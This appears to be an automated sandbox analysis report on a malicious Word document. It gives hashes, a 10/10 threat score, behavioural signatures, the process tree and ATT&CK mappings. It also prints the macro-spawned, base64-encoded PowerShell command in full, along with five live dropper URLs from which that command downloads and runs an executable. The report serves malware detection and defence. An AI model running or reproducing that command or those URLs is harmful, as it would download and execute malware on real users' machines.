Analysis

  • max time kernel
    145s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220112
  • submitted
    01-02-2022 03:10

General

  • Target

    e69742e157bd0b2dc16aec06611d17972f1b733e8caff3f4234057580ac5edde.doc

  • Size

    248KB

  • MD5

    3be6ed83df84dec0842cab36c8a76ddc

  • SHA1

    3bb3ddb72addde0f5bce63fd23bc40275bb29500

  • SHA256

    e69742e157bd0b2dc16aec06611d17972f1b733e8caff3f4234057580ac5edde

  • SHA512

    3e85029ab32a4bfafe5d0c95022bcfcf23129e3ff01c0013c721f51737fe8c1310748bdcc6f0823ee13ac88d743b6638e046a02019bf8888f7e6d1576b4171e9

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://biederman.net/leslie/lL/

exe.dropper

http://nissanbacgiang.com/wp-content/xR3/

exe.dropper

http://equidaddegenero.iztacala.unam.mx/wp-admin/XPF/

exe.dropper

http://www.zestevents.co/wp-includes/GJAo/

exe.dropper

http://stylishlab.webpixabyte.com/thjowrk5e/9UG/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Sets service image path in registry 2 TTPs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 41 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e69742e157bd0b2dc16aec06611d17972f1b733e8caff3f4234057580ac5edde.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:3580
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p
    1⤵
      PID:204
    • C:\Windows\System32\WaaSMedicAgent.exe
      C:\Windows\System32\WaaSMedicAgent.exe 420857fd5495466f06c25a37d2ad312a J8wrm8B0akOEgPouubXOBA.0.1.0.0.0
      1⤵
      • Modifies data under HKEY_USERS
      PID:1760
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -nop -enc JABHAG8AawBHAEMANABBADQAPQAoACcAegBfACcAKwAnAEEAWgAnACsAJwBrAG8ARABBACcAKQA7ACQAUgBfAEEAawAxAF8AQQBBAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGkAVQBvAF8ARABBAD0AKAAnAGgAdAAnACsAJwB0AHAAOgAvAC8AYgBpAGUAZABlAHIAbQBhACcAKwAnAG4ALgBuAGUAdAAvAGwAZQBzAGwAaQBlAC8AbAAnACsAJwBMAC8AJwArACcAQABoAHQAdABwADoALwAnACsAJwAvAG4AaQBzAHMAYQAnACsAJwBuAGIAYQAnACsAJwBjAGcAaQBhACcAKwAnAG4AZwAnACsAJwAuAGMAJwArACcAbwBtAC8AdwBwAC0AYwBvACcAKwAnAG4AdABlAG4AdAAnACsAJwAvAHgAUgAnACsAJwAzAC8AJwArACcAQAAnACsAJwBoAHQAdAAnACsAJwBwADoALwAnACsAJwAvAGUAcQB1AGkAZABhAGQAZABlAGcAZQBuAGUAcgAnACsAJwBvAC4AJwArACcAaQB6AHQAJwArACcAYQBjAGEAbABhAC4AdQAnACsAJwBuAGEAbQAuAG0AeAAvACcAKwAnAHcAcAAtAGEAZABtAGkAbgAvACcAKwAnAFgAUABGAC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AJwArACcAegAnACsAJwBlAHMAdABlAHYAZQBuAHQAJwArACcAcwAuAGMAbwAvAHcAcAAtACcAKwAnAGkAJwArACcAbgBjAGwAdQBkAGUAcwAvAEcAJwArACcASgBBACcAKwAnAG8ALwBAAGgAdAB0AHAAJwArACcAOgAvAC8AJwArACcAcwB0AHkAJwArACcAbABpACcAKwAnAHMAaABsAGEAYgAuAHcAZQBiAHAAaQB4AGEAYgB5AHQAJwArACcAZQAnACsAJwAuAGMAJwArACcAbwBtAC8AdAAnACsAJwBoAGoAbwB3AHIAawA1ACcAKwAnAGUALwA5AFUARwAvACcAKQAuAFMAcABsAGkAdAAoACcAQAAnACkAOwAkAHYAWgBBAEEAQgA0AD0AKAAnAFEAQwBBAEIAJwArACcAQgBBAFUAJwApADsAJABKAFUAQQBrAEEAQQAgAD0AIAAoACcANAA4ACcAKwAnADYAJwApADsAJABGAGsAWgBBAEQAWgBVAD0AKAAnAGoAJwArACcANABfAEEAQQBCAEEAJwApADsAJABtAFEAVQBrAHcARwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQASgBVAEEAawBBAEEAKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJAByAEIAQQBCAEQAbwAgAGkAbgAgACQAaQBVAG8AXwBEAEEAKQB7AHQAcgB5AHsAJABSAF8AQQBrADEAXwBBAEEALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAcgBCAEEAQgBEAG8ALAAgACQAbQBRAFUAawB3AEcAKQA7ACQAQwBYAGsAQQBBADQAQQA9ACgAJwBWADQAQgBBACcAKwAnAEEAawBBACcAKQA7AEkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAG0AUQBVAGsAdwBHACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAANAAwADAAMAAwACkAIAB7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQAbQBRAFUAawB3AEcAOwAkAG4ARABBAEEAdwBvAFgAPQAoACcAcwAnACsAJwBvAEEAeABBAEQAJwApADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGMAdwBRAEEAQQBRAHgAPQAoACcARQBCAG8AYwAnACsAJwBBAEEAJwApADsA
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2360

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    Query Registry

    2
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2360-160-0x000001A257F20000-0x000001A257F42000-memory.dmp
      Filesize

      136KB

    • memory/2360-166-0x000001A258400000-0x000001A2704B0000-memory.dmp
      Filesize

      384.7MB

    • memory/2360-165-0x000001A258400000-0x000001A2704B0000-memory.dmp
      Filesize

      384.7MB

    • memory/2360-162-0x000001A258400000-0x000001A2704B0000-memory.dmp
      Filesize

      384.7MB

    • memory/3580-133-0x00007FFDC2850000-0x00007FFDC2860000-memory.dmp
      Filesize

      64KB

    • memory/3580-137-0x00007FFDC06F0000-0x00007FFDC0700000-memory.dmp
      Filesize

      64KB

    • memory/3580-138-0x00007FFDC06F0000-0x00007FFDC0700000-memory.dmp
      Filesize

      64KB

    • memory/3580-134-0x00007FFDC2850000-0x00007FFDC2860000-memory.dmp
      Filesize

      64KB

    • memory/3580-130-0x00007FFDC2850000-0x00007FFDC2860000-memory.dmp
      Filesize

      64KB

    • memory/3580-132-0x00007FFDC2850000-0x00007FFDC2860000-memory.dmp
      Filesize

      64KB

    • memory/3580-131-0x00007FFDC2850000-0x00007FFDC2860000-memory.dmp
      Filesize

      64KB

    • memory/3580-224-0x00007FFDC2850000-0x00007FFDC2860000-memory.dmp
      Filesize

      64KB

    • memory/3580-225-0x00007FFDC2850000-0x00007FFDC2860000-memory.dmp
      Filesize

      64KB

    • memory/3580-226-0x00007FFDC2850000-0x00007FFDC2860000-memory.dmp
      Filesize

      64KB

    • memory/3580-227-0x00007FFDC2850000-0x00007FFDC2860000-memory.dmp
      Filesize

      64KB